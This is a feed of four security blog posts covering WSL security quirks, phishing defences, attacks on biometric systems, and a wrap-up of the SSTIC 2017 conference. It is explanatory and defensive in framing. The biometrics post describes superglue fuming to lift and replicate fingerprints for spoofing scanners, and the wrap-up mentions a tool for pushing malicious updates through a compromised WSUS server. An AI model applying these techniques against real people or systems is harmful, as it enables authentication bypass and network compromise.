Exploring Windows Subsystem for Linux https://labs.portcullis.co.uk/blog/exploring-windows-subsystem-for-linux/ https://labs.portcullis.co.uk/blog/exploring-windows-subsystem-for-linux/#comments Thu, 27 Jul 2017 09:00:04 +0000 https://labs.portcullis.co.uk/?p=5869 Whilst there has been quite a lot of analysis of Microsoft’s new Windows Subsystem for Linux (aka WSL or Bash on Ubuntu on Windows) and how it functions (particularly from Alex Ionescu), most of this has focused on how it affects the Windows security model. Being a keen UNIX focused researcher, I decided to take […]

The post Exploring Windows Subsystem for Linux appeared first on Portcullis Labs.

]]>
Whilst there has been quite a lot of analysis of Microsoft’s new Windows Subsystem for Linux (aka WSL or Bash on Ubuntu on Windows) and how it functions (particularly from Alex Ionescu), most of this has focused on how it affects the Windows security model. Being a keen UNIX focused researcher, I decided to take it for a spin.

The first thing I did once I had it installed was look at how the Windows process tree had changed. Running it results in two new branches to your process tree. The first contains the Windows bash.exe instance which hosts your new terminal:

  • explorer.exe (runs as your user):
    • bash.exe (runs as your user):
      • conhost.exe (runs as your user)

Whilst the second contains the Linux process tree:

  • svchost.exe (runs as SYSTEM):
    • init (runs as your user, no disabled privileges, locked into a job):
      • bash (runs as your user, disabled privileges, locked into a job, break away set to true)

As you might expect, new code compiled to support this is well hardened and uses Windows 10′s advanced mitigations. Specifically, bash.exe has the following mitigations enabled:

  • DEP enabled
  • ASLR high entropy, bottom up
  • CFG enabled

Digging a little further, the same can’t be said for init, bash and other parts of the Linux process tree. Whilst DEP is enabled, ASLR and CFG are not. In fairness, this shouldn’t come as any great surprise – they’re Ubuntu packaged binaries however it does start to show show how introducing WSL to your system can change the systems posture.

The kernel

So what does the “kernel” version look like. Well, at the point I examined it:

x@DESKTOP-L4857K3:~$ uname -a
Linux DESKTOP-L4857K3 3.4.0+ #1 PREEMPT Thu Aug 1 17:06:05 CST 2013 x86_64 x86_64 x86_64 GNU/Linux

This version of the Linux kernel should be vulnerable to dirty cow, so what of it? It doesn’t work which again isn’t a huge surprise. As Alex has alluded to there is a quite a substantial amount of mapping going on to implement the Linux system calls on Windows and whilst they should be API compatible, the implementations between a real Linux kernel and what WSL gives up may be quite different.

This does however bring up the first critical point: There is no relationship between the patches supplied as part of Windows Update and what goes on with WSL. If you don’t patch regularly you’ll still be vulnerable to a whole plethora of Ubuntu (userland) vulnerabilities.

Memory corruption mitigations

Some Linux mitigations are in play however (as they would be on any real Ubuntu system) as can be seen with checksec.sh:

  • System-wide ASLR (kernel.randomize_va_space): On (Setting: 2)
  • Does the CPU support NX: Yes

And of course binaries are compiled with whatever Ubuntu hardening is currently supported:

	COMMAND    PID RELRO             STACK CANARY           NX/PaX        PIE
	  init      1 Full RELRO        Canary found           NX enabled    Dynamic Shared Object
	  sudo     14 Partial RELRO     Canary found           NX enabled    Dynamic Shared Object
	    su     15 Partial RELRO     Canary found           NX enabled    No PIE
	  bash     16 Partial RELRO     Canary found           NX enabled    No PIE
	  bash      2 Partial RELRO     Canary found           NX enabled    No PIE

Shared memory

So what does WSL look like more generally. Well, since I’ve had some fun with shared memory, I wondered how this was implemented. Well, it turns out that it’s not:

root@DESKTOP-L4857K3:~# ipcs

kernel not configured for shared memory

kernel not configured for semaphores

kernel not configured for message queues

Whether this will have any security implications, it’s difficult to say but at the very least it may stop certain applications from working. Other applications may revert to using other less well tested IPC mechanisms which may expose security issues along the way.

Debugging

Moving on, how about debugging something. A simple tool which exercises the ptrace() system call is strace. Here’s what happens when strace is run on a normal process:

root@DESKTOP-L4857K3:/sys# strace -f printf "test" 2>&1 | head -n 5
execve("/usr/bin/printf", ["printf", "test"], [/* 15 vars */]) = 0
brk(0)                                  = 0xa9d000
...

However you can’t strace PID 1 (as would have been possible on real Linux), instead ptrace() returns an error: “Operation not permitted”.

File systems

Whilst /mnt doesn’t show up as a different file system, /mnt/c is actually used to map the underlying Windows system disk. This is immediately peculiar since it is mapped with permissions of 0777 (world readable, world writable amongst others). Moreover any files created under it are created with an owner of root. You’d think this might be a problem but from what I’ve seen so far, assuming the Windows file permissions are set right then (because everything (even setUID processes) runs as you from Windows’ perspective) you won’t be able to access anything inappropriate (think SAM etc). It. Just. Looks. Weird.

Furthermore, the way that WSL implements umasks too is an oddity. umask doesn’t work on all file system types and in particular the aforementioned /mnt/c. Observe the following:

root@DESKTOP-L4857K3:/# umask 666
root@DESKTOP-L4857K3:/# touch foo
root@DESKTOP-L4857K3:/# ls -la foo
---------- 1 root root 0 Mar 28 23:10 foo
root@DESKTOP-L4857K3:~# rm foo
root@DESKTOP-L4857K3:~# cd /mnt/c/Users/x/
root@DESKTOP-L4857K3:/mnt/c/Users/x# touch foo
root@DESKTOP-L4857K3:/mnt/c/Users/x# ls -la foo
-rwxrwxrwx 1 root root 0 Mar 28 23:10 foo

Umask is honoured in the first location but not the second (a umask of 0666 should mean that files are created with no permissions). Whilst there’s a fundamental Windows reason why this is the case, there is nothing to indicate this to the Ubuntu instance’s userland and thus files created within your home directory might be created with undesirable permissions. Microsoft are tracking this in the GitHub as issue 352.

Authentication

Unlike on a real Ununtu there’s no terminal level authentication (whilst user accounts within the Ubuntu instance do have passwords, they’re not needed unless you want to access the system remotely or gain root privileges via sudo). Moreover, from Windows’ perspective there is no difference between UID 0 and UID 1000. You can start a terminal and then use sudo to elevate your privileges and Windows will be none the wiser (Linux capabilities aren’t mapped into Windows user rights or special tokens). That might mean that users won’t care too much about their Ubuntu instance’s passwords but as you can imagine with no password policy enforcement, users might be tempted to reuse their Windows passwords.

I should also note that whilst sudo prompts for a password on each new instance of bash.exe/conhost.exe pair hosting a terminal however if you authenticate to sudo, close the terminal and then reopen it, then your sudo ticket may still be valid – this requires exact co-ordination as sudo sessions are tracked by PID, however the first terminal opened will always have a Linux bash process with a PID of 2 which may well be blessed from a previous sudo session.

Privileges

Finally, as per issue issue 561, because everything runs as you from Windows’ perspective, the only way to successfully execute ping (which requires an ICMP raw socket on Linux) is to run bash.exe in elevated mode (as Administrator). This, despite the fact that a non-elevated user can quite happily execute ping on the Windows host. WSL doesn’t even implement concept of root in any real sense, let along implement the necessary Linux syscalls to support capabilities in any useful fashion. This in turn means that everything else spawned from the elevated shell also runs with Windows administrative privileges. For comparison, here’s what the new branches of your process tree will look like:

  • wininit.exe.exe (runs as SYSTEM):
    • services.exe (runs as SYSTEM):
      • svchost.exe (runs as SYSTEM):
        • RuntimeBroker.exe (runs as your user, disabled privileges, not elevated):
          • bash.exe (runs as your user, disabled privileges, elevated):
            • conhost.exe (runs as your user, disabled privileges, elevated)

The first contains the Windows bash.exe instance which hosts your new terminal, whilst the second contains the Linux process tree:

  • svchost.exe (runs as SYSTEM):
    • init (runs as your user, no disabled privileges, locked into a job, elevated):
      • bash (runs as your user, disabled privileges, locked into a job, break away set to true, elevated):
        • sudo (runs as your user, disabled privileges, locked into a job, break away set to true, elevated):
          • ping (runs as your user, disabled privileges, locked into a job, break away set to true, elevated)

Microsoft’s stock answer is that the Ubuntu instance (or rather the bash.exe instance hosting the terminal and accompanying lxss.sys kernel implementation) is locked down, effectively sandboxed by a combination of Windows DACLs, the concept of jobs (touched upon at the start and akin to Linux cgroups) and syscall mapping that effectively uses lxss.sys to proxy most syscalls onto their corresponding NT kernel implementation.

Conclusion

The design of WSL seems to be relatively robust if slightly odd, however time will tell, particularly if offensive teams pick up the whiff of a new opportunity. If nothing else, take this article as a reminder that WSL should not be considered a security boundary and that it will remain unmanaged irrespective of how you administer your Windows hosts.

The post Exploring Windows Subsystem for Linux appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/exploring-windows-subsystem-for-linux/feed/ 0
A study in scarlet https://labs.portcullis.co.uk/blog/a-study-in-scarlet/ https://labs.portcullis.co.uk/blog/a-study-in-scarlet/#comments Thu, 20 Jul 2017 12:28:58 +0000 https://labs.portcullis.co.uk/?p=5917 In the modern age, where computers are used for nearly everything we do, the damage that can be caused to a company by cyber-attacks is substantial, with companies losing millions in regulatory fines, compensation and declining share prices. While some of these breaches have been caused by vulnerabilities within the target company’s infrastructure/software, a large […]

The post A study in scarlet appeared first on Portcullis Labs.

]]>
In the modern age, where computers are used for nearly everything we do, the damage that can be caused to a company by cyber-attacks is substantial, with companies losing millions in regulatory fines, compensation and declining share prices. While some of these breaches have been caused by vulnerabilities within the target company’s infrastructure/software, a large quantity of them began with a phishing attack.

Generally speaking, phishing is a social engineering technique that involves sending fraudulent emails to individuals in an attempt to coerce them into providing confidential information or network access. Spear phishing is a more targeted form of this, where attackers will target specific individuals within an organisation and use information gathered from publicly available resources, such as social media, to make the malicious emails seem more genuine. This attack technique is very effective, with previous research showing victims being up to 4.5 times more likely to believe the contents of targeted emails. Additionally, targeting specific individuals with more access within an organisation, such as managers or system administrators, gives the attacker a greater chance of finding sensitive information than that provided by standard phishing.

The best defence against phishing attacks is to have employees that are aware of the threat and the methods of identifying them. That being said, it’s important to support your employees in this effort, minimising risk and the potential for human error, which is why employers should be doing everything they can to ensure that the emails do not reach their targets and, when they do, that they are easy to identify and report. This can be achieved by looking at the cyber kill chain, as documented by Lockheed Martin, and implementing sensible security controls at each of the stages that relate specifically to a phishing attack.

Delivery

The first part of the cyber kill chain where we can actively identify these attacks is at the delivery stage – when a malicious email hits the external mail server of an organisation. The following security controls can be put in place at this stage of an attack to identify and mitigate the majority of phishing attacks.

Mail content scanning

The most obvious place to search for indicators of a phishing attempt is the content of the emails themselves. By analysing information gathered about common attacks used by malicious actors, it is possible to identify potential phishing attacks before they reach the intended target. The contents of these emails can then be modified to make it easier for users to identify them.

As attackers use phishing as a method of gaining unauthorised access to systems or data, a common attack vector is to include a hyperlink to a web application that they control. Modern mail clients capable of rendering HTML emails make this attack method even more effective, as attackers are able to change the text that is displayed to the user in place of the hyperlink. To help the user identify the threat and limit the risk of this method of attack, hyperlinks should be rewritten to display to the user where their browser will take them if they click on the link.

As phishing attempts will generally come from a network location external to their intended targets, another very simple but effective method of improving a user’s likelihood of identifying a phishing attack is the addition of a warning to the email, stating that it is from an external user. Users seeing that emails have come from an external location are much more likely to exercise caution when following hyperlinks.

Attachments

Malicious attachments sent via phishing email are a very real and dangerous threat as, at worst, they could allow an attacker to bypass all external protections and provide them with direct access to a company’s internal network. The most secure method to avoid the risk of this threat would be to block all email attachments coming into a company, however, for the majority of businesses this is not practical and would severely limit their ability to communicate with clients/third-parties. The following security controls can help to mitigate the potential damage that could be caused by malicious attachments:

  • File rewrite – a number of security solutions on the market are able to convert files into a safe format, for example, rewriting a Microsoft Docx file into a PDF so that no Macros can be executed
  • Moderator review – One very effective method of mitigating this threat is to hold all emails from external addresses that contain attachments in a quarantine system until they have undergone administrator review. This will allow them to examine the contents of the emails to determine whether or not they are malicious
  • Password protected attachments – As security solutions have no feasible way of decrypting password protected files, there is no way of automatically validating the whether or not their content is malicious. Due to this, it is important to make sure they are either blocked from entering your organisation or, if there is a business requirement for such attachments, at a minimum they should undergo sandboxing or moderator review

Domain names

A common attack technique used to trick users into providing sensitive information is to use a domain that is close to a company’s legitimate domain. In order to counter this type of attack, security solutions can be employed to review how similar a sending domain is to the company’s legitimate domain, blocking emails from all domains that are above a certain level of similarity.

Another attack technique that has been discussed a large amount recently is the use of Internationalised Domain Names (IDN). IDNs are domain names that contain at least one character that is not within the normal ASCII character set. In order to facilitate this, domains can be registered as specially formatted ASCII strings, which are preceded by the characters “xn--”. This representation is what is actually registered with domain providers and is called Punycode. Using IDNs, attackers can register domains that look very similar to legitimate sites by changing ASCII characters for Unicode characters (e.g. www.goógle.com could be registered using the Punycode www.xn--gogle-1ta.com). As these IDN domains are actually registered using the Punycode for the domain name, mitigating the threat of this attack technique can be achieved by blocking all domain names that begin with the characters “xn--”.

A further way of using a domain to identify malicious activity is to analyse what it appears to be used for. A number of security solutions on the market assign categories to domains, usually based on analysis of the services running on the systems (e.g. the content that is hosted on a web server). Using these solutions, it is also possible to report domains that have been identified as being used in phishing or other malicious activities. As the majority of these solutions operate using a cloud based central server, once a domain has been marked as malicious it will be impractical for attackers to use it in further attacks. Additionally, as attackers are unlikely to want to have their personal details registered to accounts for use in these services, it is likely that they will be unable to have their domains categorised when they set up their phishing. Blocking emails from domains that are not yet categorised can be just as effective at ensuring that phishing attempts do not reach their target.

Email validation

The wide range of open source software available to us makes it simple to set up and use a mail server for a domain of our choosing. This, however, provides attackers with the opportunity to send emails as if they were coming from a legitimate site – name@yourcompanynamehere.com for example. A number of technologies are available that will help to ensure that attackers are not able to spoof emails in this way:

  • Sender Policy Framework (SPF) – SPF is an email validation system which allows domain administrators to define the hosts that are allowed to send emails for their domain, through the use of a specially formatted DNS TXT record:
An example SPF record entry
image-5918

An example SPF record entry

  • Domain Keys Identified Mail (DKIM) – DKIM also uses a specially formatted DNS TXT record to validate the sender of an email, through the use of public/private key cryptography. The sending mail server adds a digital signature to outgoing emails, which can be verified using a public key that is published within the DNS record. This email validation method also provides data integrity for the emails, as any alterations made in transit will affect the validation of the digital signature.
An example DKIM signature in an email header
image-5919

An example DKIM signature in an email header

  • Domain-based Message Authentication, Reporting and Conformance (DMARC) – DMARC takes the 2 validation systems defined above and builds on them to create a much more robust system. It allows domain administrators to define which validation systems are to be used by mail servers for the domain (either SPF, DKIM or both) and how mail servers should handle emails that do not pass the validation process.

By utilising these security controls and ensuring that our receiving mail server is checking the DNS records against the information in emails, we are able to ensure that attackers are unable to spoof emails from legitimate domains.

Malicious email reporting

If a malicious email does manage to get through all of the security controls at the perimeter, it is likely that at least some of their intended targets will fall for the scam. With that in mind, it is important that users have a method of notifying the people responsible for the security of your organisation that a malicious email has slipped through the net. Multiple solutions for this are available, such as the creation of a plugin for the company mail client or a mailing list that is used to report malicious emails. In tandem to this, policies and procedures should be put into place, which detail the process administrators and security staff should follow to inform employees that there is a phishing attack underway and how to identify it.

Mail client plugin
image-5920

Mail client plugin

Exploitation, installation and command & control

A number of security controls can be used to mitigate the threat of phishing attacks across the next 3 stages of the cyber kill chain – Exploitation, Installation and Command & Control. If an attack has managed to progress this far along the cyber kill chain it is imperative that it is identified and stopped to ensure that the attacker is not able to gain a foothold on an internal network.

End point protection

The most obvious method of blocking malicious applications from running on a target user’s system is to install an End Point Protection application. There are a number of options for this on the market, each of them able to detect and protect against millions of variants of malware and other unwanted applications. These products can help to stop an attack at either the Exploitation or Installation stages of the cyber kill chain by identifying and blocking malicious files/activity.

Outbound proxies

A common method of attack used in phishing attempts is to provide a link within the email that, when followed, will display a page asking for credentials or other sensitive information. In order to stop attackers using this technique, a network proxy can be used to block traffic to unknown domains. One possible solution to this issue is to only allow access to the top ranked sites, however, for some organisations this may not be practical. In situations such as this, a moderator/administrator should review any unknown domains to ensure that they are not malicious.

In addition to mitigating the threat of users disclosing sensitive information, these solutions can help to break the cyber kill chain at the installation and command & control (C2) stages, by stopping malware from using HTTP connections to unknown domains to download Remote Access Tools (RATs) or as a C2 channel.

Sandboxing

Sandboxing is the practice of using a system that is not connected to the live network (usually a virtual machine) to test files for malicious activity. As most attachments used in phishing attacks will have similar behaviour (e.g. connecting back to a command & control node) after being opened, sandboxing can be used to identify them within a safe environment to ensure that no live systems are affected. By using sandboxing technologies we can analyse the behaviour of files against indicators of malicious activity at all three of the stages of the kill chain.

Threat intelligence

While having all of the security solutions described above can help to identify and mitigate the threat of phishing attacks, the individuals behind the attacks are always developing and adapting their methodologies. Taking this into account, it is of utmost importance that the indicators of attack that we are looking for evolve with them. By feeding any information gathered from previous attacks into cloud-based threat intelligence platforms, the security community’s understanding of how attackers are operating will grow, which will in turn improve our ability to stop them.

Summary

While the threat of phishing attacks and the damage they can do is significant, both financially and to a company’s reputation, by looking at the timeline of these attacks it is possible to identify many security controls that can be used to mitigate them. By utilising these controls, through a defence-in-depth approach to security, we are able to limit the number of malicious emails that reach their targeted users. Furthermore, by using information about recognised indicators of attack, we are able to alter the contents of emails to assist users in the identification of emails and content that could potentially cause a security breach.

The post A study in scarlet appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/a-study-in-scarlet/feed/ 0
Biometrics: Forever the “next big thing” https://labs.portcullis.co.uk/blog/biometrics-forever-the-next-big-thing/ https://labs.portcullis.co.uk/blog/biometrics-forever-the-next-big-thing/#comments Thu, 06 Jul 2017 10:08:30 +0000 https://labs.portcullis.co.uk/?p=5806 It’s not every day we get to assess biometric systems from a security perspective, they are still somewhat esoteric and testing them doesn’t quite fit with the usual slew of things that come along with being a security consultant. Recent engagements reminded us of just how interesting this facet of the industry can be and […]

The post Biometrics: Forever the “next big thing” appeared first on Portcullis Labs.

]]>
It’s not every day we get to assess biometric systems from a security perspective, they are still somewhat esoteric and testing them doesn’t quite fit with the usual slew of things that come along with being a security consultant. Recent engagements reminded us of just how interesting this facet of the industry can be and so we decided to write up a little something around biometrics. This article will cover some of the history and the basics of biometrics and some of the biometric-centric attacks you may come across…

Biometrics aren’t new

They have been around for, well, as long as we have. There is evidence that cavemen used to sign paintings with a handprint as a way to confirm authorship. Traders used to keep ledgers with physical descriptions of trade partners. Police started keeping “biometric databases” of criminals hundreds of years ago.

Even digital biometrics have been around for decades. Digitised systems, especially for voice, writing and fingerprints, started coming in to being in the 1970′s and 1980′s, largely funded by government and law enforcement agencies such as the FBI.

Somewhere around the 1990′s is when biometrics as we know them today came in to form: fully digitised and automated systems, automatic facial recognition in CCTV, biometric passports, etc… Since then it has largely been about miniaturisation, increasing sensor/template accuracy and finding new, novel things to measure such as ear biometrics – which I’m going to go on a whim and say nobody needs or wants.

Recently, biometrics have started to make their way directly in to the lives of consumers on a larger scale, thanks to increasing adoption of fingerprint and facial/retina scanners amongst smartphone and laptop manufacturers.

But what happens when a user enrols their finger – or any other appendage – on a biometric device?

A pixelated finger (probably).
image-5807

The biometric device makes an acquisition using whatever sensor is installed, for example a CCD or optical sensor like in a camera, or a capacitance scanner, even potentially an ultrasound scanner. This scan is then analysed for “interesting” things, or minutia. These important bits of the biometric are isolated and saved in a binary template, the rest of the reading is generally discarded.

Of course, manufacturers have their own algorithms for creating templates and matching. But in general, each template boils down to something akin to coordinates. For template matching, a number of different comparison algorithms are used, with hamming distances being the most common that I’ve seen. At a simple level, hamming distances measure the differences between two equal [length] strings [presented templates].

To explain this a bit clearer: when a user puts their finger on a fingerprint scanner, they don’t always put it in the exact same place or at the exact same angle. By using an algorithm such as hamming distances to calculate the difference, biometric devices can judge the presented biometric based on a number of different factors, such as the distances between each minutia detected with those of stored templates.

But it’s not all about fingertips and eyeballs

A table showing common biometrics and their attributes
image-5808

The above table is by no means a complete list of biometrics, it merely covers the ones people hear of or encounter the most. It is also by no means 100% representative, it is meant as a general guideline.

Accuracy in the table is how unique to an individual that biometric is and therefore the scan too. So for example hand geometry is not very accurate or unique – usually all that happens is the acquisition device takes a measurement of the key points of the hand (tips and grooves of the fingers and the width). Iris and retina are considered high accuracy because they are unique traits, even between identical twins and relatively high-quality acquisitions can be made. Just to clarify: the iris is the nice colourful part at the front of the eye which controls the eye’s aperture and the retina refers to the nerves near the back of the eye which collect that light, specifically in Biometrics, we refer to the veins.

Security is how safe the biometric is in terms of potential to being inadvertently “stolen”. So for example fingerprints aren’t very secure at all, people leave them all over the place, almost like leaving post-it notes with their passwords everywhere. The Retina is the only one that is considered high on this list because it is the only truly “internal” trait listed, so it isn’t something that can be seen or copied easily.

The final column is Usability, this is how easy it is to actually use the system. Fingerprint scanners are easy, just plop the finger on the acquisition sensor and away you go. Iris and face require the user to stand still in front of a camera so are a bit more awkward. Retina is the most difficult, because it’s an internal trait and difficult to scan. To use it the user has to place their eye right up the sensor and have a relatively unpleasant bright light shone in to their eye. Not particularly pleasant.

Finger vein and palm vein scanning are two types of biometrics I haven’t listed here but are quite promising and gaining increased traction. They both offer a sensible alternative to fingerprints – they retain most of the usability of fingerprints while removing the weakness of using an external trait. I’d personally really like to see a smartphone with an IR-based palm vein reader on the back, but maybe I’m just a little bit crazy.

Attack vectors

Just as with any other system, biometrics expose a slew of network and local attack vectors. From replaying old templates, modifying data in transit, modifying or theft from the backend database, brute force attacks etc. The security industry knows of these attacks all-to-well and we also know how to defend against them. What we are more interested in is the attack vectors a bit more specific biometrics: so attacking the input device (sensor) and the templates themselves.

Over the years, a number of techniques to achieve a successful authentication illegitimately have come to light, we’ll cover a few of the more common ones below:

Reverse engineering

We’ll start with the templates themselves. Imagine that we have acquired a template somehow (i.e. we have compromised a database containing biometric templates) and now need to get past an actual biometric scanner.

At some point in time, it was thought reverse engineering biometric templates back in to a presentable appendage wasn’t possible. After all, templates are just a few bytes of data which don’t contain enough information to reconstruct the original biometric from. This technique is essentially the biometric equivalent of “password cracking”.

As we already know, templates generally list the coordinates of the minutia in a biometric. This means that realistically the key information is already there, it just needs to be worked out in terms of a mappable grid and then add in all the ‘uninteresting’ data so that it resembles an actual trait.

This is something that sounds easier in theory than it is in practise, I’ve only ever seen it achieved successfully in lab environments.

A specific case-study that comes to mind is around iris reverse engineering, found in the “Handbook of Iris Recognition”.

The team used an open source system developed by Libor Masek to create an initial group of reconstructed irises which were then tested against the system. The closest matches from the initial group were then combined along with some new, random generation data. This repeated until a match was found. In over 90% of the cases the attack succeeded eventually.

Hillclimbing attacks

This class of attack is similar to a reverse engineering attack, except the attack starts without a template to work off of. Instead, the attacker would have to rely on the biometric system doing something stupid, such as returning the match percentage of any authentication attempt. Most of the security-conscious systems today do not do this, but there are still some edge-cases and older devices which do.

Against a system which does not return data about how close the match was to the sensor, the attacker would simply have to resort to brute-force attacks. Much like the equivalent for password cracking, it would just be a matter of trying a large number of templates [hashes] and comparing them against the real one. And just as with password brute-forcing, it’s much easier to do that with a stolen template than it is on a live system which may have anti-automation features such as account lockouts, rate limiting, etc.

Spoofed physical biometrics

Spoofed biometrics get a large amount of attention compared to other methods, especially when it comes to fingerprints and creating replicas. So how easy is it to take someone’s fingerprint and produce a working model from it?

The short answer is that it is relatively easy to do with the right equipment and a good fingerprint to work off of.

Possibly the most well-known and widely used method is the one known as “cyanoacrylate [superglue] fuming”.

Cyanoacrylate, when it evaporates, has a remarkable tendency to be attracted to grease (i.e. latent fingerprints left on things) in humid environments. Once it settles on the grease it re-solidifies, leaving a nice rigid and clearly marked fingerprint where before there was only grease. These prints are much more durable and defined, which makes them easier to extract and create a spoofed print from.

Superglue fuming is actually remarkably easy to do: all that is required is a container to put the thing you want to extract a fingerprint from in (such as a box or small fish tank), along with a small amount of superglue on some foil. Usually a heat source under the superglue (to help it evaporate quicker) and a small cup of water (to aid with humidity) are also added, for extra efficiency. Then simply wait a while.

After the print has settled nicely, it is simply a matter of extracting it and inverting it. There are many ways to do this, such as dental mould, high-resolution scans, even high-quality clear tape. Most professionals will attempt to further enhance a print at various stages, using things such as fine powders etc. But this post is meant as an overview, not an in-depth guide on how to extract prints.

The image below shows all the basic materials required for fingerprint extraction and superglue fuming:

superglue fuming
image-5809

In addition to extracting latent prints, back in 2014 a demonstration by a speaker at CCC in Germany showed that it is possible to spoof a fingerprint scanner on a smartphone starting with just a high-enough resolution photo of a person’s finger. If we put this in a “worst-case” context: when you use a fingerprints for authentication, not only are you potentially leaving copies of your unchangeable ‘password’ in places, you’re also carrying it around with you in plain sight.

Other biometrics

Voice-based biometrics are another area on the rise, especially as a way to ‘verify’ someone quickly and remotely (i.e. over the phone) – often touted as a way to reduce phone support overheads and costs via automation.

The primary attack vector is as one would expect here: replay attacks – so recording someone enrolling or authenticating and then replay the recording later – are surprisingly easy to execute and most voice biometric systems only appear to have very limited or non-existent abilities to detect or prevent replays.

To put this in a more traditional ‘password’ context, it’s like saying your password out loud for everyone to hear every time you use it. It doesn’t take an exceptional amount of skill to place a recording device. Voice distinction is also a limiting factor in voice biometrics. Imitating the speech pattern (mainly pitch, inflection of phonemes and cadence) of others is not hugely difficult with a bit of practise and thought.

Summary

The attacks described here are not all particularly mature, but they have not needed to be. Biometrics aren’t widely adopted and therefore are not a high-priority target. If there was real demand, we’d all keep biometric template cracking and reconstruction software on our machines.

Imagine a world where passwords were replaced by biometrics, once a breach happens – and lets be honest, sooner or later a breach always happens – you would spend the rest of your life wondering if it is game over for your all your logins that use your finger (or whatever) and it would be out of your control. There is often a lot of grumbling around passwords, but at least passwords are easily changed should the worst happen. Get a password manager and the trouble of remembering them all even largely goes away (I wish major OS’s would start incorporating decent password-managers when shipped, to get people in to this habit).

Of course, there is the third major option amongst all this: “something you have” – access cards of varying types. RFID, NFC, even cards with PKI certificates. All have their pros and cons and are part of a larger debate which I won’t bother going in to here. Ultimately, the industry has already decided that multi-factor authentication is the way to go for situations where security is prioritised. Biometrics fit in to this as part of the “multi” – use them alongside something else. And no, I don’t mean alongside a username/ID, that is not private information. An access token and/or a password.

The post Biometrics: Forever the “next big thing” appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/biometrics-forever-the-next-big-thing/feed/ 0
SSTIC 2017 wrap-up https://labs.portcullis.co.uk/blog/sstic-2017-wrap-up/ https://labs.portcullis.co.uk/blog/sstic-2017-wrap-up/#comments Tue, 27 Jun 2017 12:55:42 +0000 https://labs.portcullis.co.uk/?p=5838 This year, one member of the Portcullis team went to one of the biggest security events in France: SSTIC (Symposium sur la sécurité des technologies de l’information et des communications). This post will highlight the most interesting presentations. Many of the slides, articles and videos are available on the SSTIC web site, but they are […]

The post SSTIC 2017 wrap-up appeared first on Portcullis Labs.

]]>
This year, one member of the Portcullis team went to one of the biggest security events in France: SSTIC (Symposium sur la sécurité des technologies de l’information et des communications). This post will highlight the most interesting presentations. Many of the slides, articles and videos are available on the SSTIC web site, but they are mostly in French.

The SSTIC event is one of the oldest security event in France with La Nuit du Hack, this year it was the 15th edition. The event is based at Rennes (Brittany), a small town with lots of students and bars. For the record, there is a street on this city which is nicknamed “Thirsty Street” because the majority of the bars of the city are located there. The event took place over 3 days (7, 8 and 9 of June) and welcomed around 600 security enthusiasts. There is only one track with 29 presentations in different formats:

  • 11 Short talks: 15 min
  • 14 Regular talks: 30 min
  • 5 Guest talks: between 45 min and 1 hour

However in addition, there are “rump sessions”, which is a sort of lightening talks with a maximum duration of 3 minutes. Why maximum? Well, due to the fact the audience is able to stop the presentation by applauding the speaker.

Here were some of our favorite talks that were delivered at this event:

Silo Administration (“Administration en Silo”)

This talk was presented by Aurélien Bordes working for the ANSSI, which is the French equivalent of the NCSC. It was a very interesting talk showing how is possible to harden your Windows domain in order to avoid a full compromise during an internal penetration test or an APT. The idea is to prevent the attackers from performing lateral movements and obtaining domain admin rights in your Windows domain.

First, the speaker explained that a Windows domain can be divided in three different levels:

  • RED: Administration resources (Active Directory, administrator workstations, etc.)
  • YELLOW: Business data and assets manipulating those data
  • GREEN: end-user workstations

Usually, the YELLOW level is the most important one. But in order to protect it, it is necessary to protect also the RED level. The idea is to improve the security of those levels by securing the authentication process in Windows. To do so, you should take the following steps:

  • Disable NTLM and use Kerberos instead
  • Forbid Kerberos delegation for the administrators
  • Protect the AS requests on Kerberos
  • Restrict the computers where the administrators are allowed to connect from

For the first two items, an administrator can easily apply those using GPO. For the other items, the following features available in Windows can be used:

These features are not new, but they are not really well known. However, to enjoy those features you need to use at least Windows 8 and Windows Server 2012 versions.

WSUSpendu

This talk was presented by Romain Coltel (Alsid) and Yves Le Provost (ANSSI). The goal was to present a new tool called WSUSpendu (pendu means hanged in French). This work was inspired by the WSUSPect tool presented at BlackHat in 2015 which allowed “Man-In-The-Middle” attacks to be performed on WSUS insecure connections in order to inject fake updates on the target. By default, WSUS use HTTP connections to send the updates, which are composed of signed binaries and XML files containing the description of the updates. The idea of the WSUSpendu tool is to inject directly fake updates on the WSUS server. The use case is very simple: if an attacker is able to compromise the WSUS server, it is possible to insert malicious updates on the WSUS database in order to target a specific workstation or a server.

This tool could be very useful during internal penetration tests and should be on your tool set.

Binacle

Another presentation made by one of the ANSSI team (Guillaume Jeanne) and another interesting tool when hunting malicious binaries. Guillaume presented a tool called Binacle which allows you to make full-text searches on binaries. Of course, the idea is not just to make string searches but also to be able to search for a series of bytes for instance. In the first part, the speaker showed us the difficulties to make searches on a binary comparing to a text file. Guillaume tried several solutions allowing to make a search in a constant timeframe, with a reasonable database size and allowing a quick insertion on the database. Next, he compared the execution time of his tool to a Yara scan. And the result is much better. So, the idea of Guillaume is to use Binacle in order to help the generation of Yara rules but also to speed up the scans.

To finish, the tool was written in Rust and could be really useful for incident response jobs.

TV5 Monde post-incident review

For the closing conference, the ANSSI team (again!) delivered feedback about the TV5 Monde hack. As a reminder, TV5 Monde is a French channel hacked in 2015 by the APT28 group. This hack was affecting the broadcast of the programmes for several days, but also the different online accounts (Twitter, Facebook and YouTube). The first part of the presentation focused on how the attackers succeed to compromise the internal network and without any surprise it was, unfortunately, pretty easy. The attackers were able to steal the credentials from a contractor (VPN access) and use them to obtain internal access to the TV5 channel network. The lack of network segregation allowed the attackers to compromise several machines and they quickly found a domain admin account. The next step was to create a specific domain administrator to be used by the attackers in order to reconnect easily. Finally, the attackers found an internal wiki containing clear-text passwords and documentation about the broadcast equipments used by TV5 Monde. The second part of the presentation focused on the remediation part and especially on how the ANSSI guys rebuilt the Active Directory. A complete retranscription of the presentation was made by Mathieu Suiche and can be found on his blog here.

This presentation was really good and it was really interesting to have some feedback about a security incident event. Bravo to the ANSSI and TV5 Monde for this feedback and for choosing to share this kind of information to the community.

Other interesting talks

  • YaCO (Yet another Collaborative tool): This tool aims to add a “multi-user” layer to the IDA Debugger in order to allow multiple persons to work on the same binary
  • Deploying TLS 1.3: Presentation made by Filippo Valsorda (CloudFare): This presentation focused on the new features available on TLS1.3. If it sounds interesting, read the blog article hereand see the video in English
  • Breaking Samsung Galaxy Secure Boot through Download mode: Frédéric Basse presented a bootloader bug in Samsung Galaxy smartphones which, with physical access allowed for the execution of arbitrary code. Full article in English
